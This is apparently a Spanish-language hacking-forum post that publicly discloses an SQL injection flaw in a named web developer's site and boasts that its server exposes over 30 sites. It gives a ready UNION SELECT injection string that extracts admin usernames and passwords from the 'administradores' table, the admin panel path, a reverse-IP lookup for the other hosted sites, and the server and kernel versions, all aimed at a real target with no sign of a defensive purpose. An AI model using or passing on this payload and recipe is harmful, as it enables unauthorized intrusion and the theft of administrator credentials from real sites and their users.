La Seguridad en Algunos servidores.

Es triste encontrar este tipo de seguridad en servidores como este. que ah muchos les hacen creer que son los mas seguros de la red, cuando no es asi. aqui les dejo unos screens de uno que me encontre que tieme mas de 30 sitios a su merced...
nota: no son todos los dominios....











Bug en web desarrolladora SUSTAM.COM


ahi haciendo un poco de pen-testing encontre una web con SQLi aqui les dejo la info

++++++++++++++++++++++++++++++++++++++++++++++++++++
web desarrolladora: SUSTAM.COM

Bug: SQLi

****************************************************
tabla:
administradores

****************************************************
columnas:

usuarios

clave
****************************************************
inyection:

-1+union+select+0,1,2,concat(usuario,0x3a,clave),4,5,6,7,8,9,10,11,12,13+from+administradores--

dato: varian los numeros de tablas en las webs, la vulnerable con mas frecuencia es la 3
*****************************************************
panel:

/admin
*****************************************************
DNSreverse:

http://www.ip-adress.com/reverse_ip/sustam.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

server info:
Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8. PHP/4.4.7
Kernel: Linux sustam02.sustam.com 2.6.18-128.2.1.el5PAE #1 SMP Tue Jul 14 07:15:01 EDT 2009 i686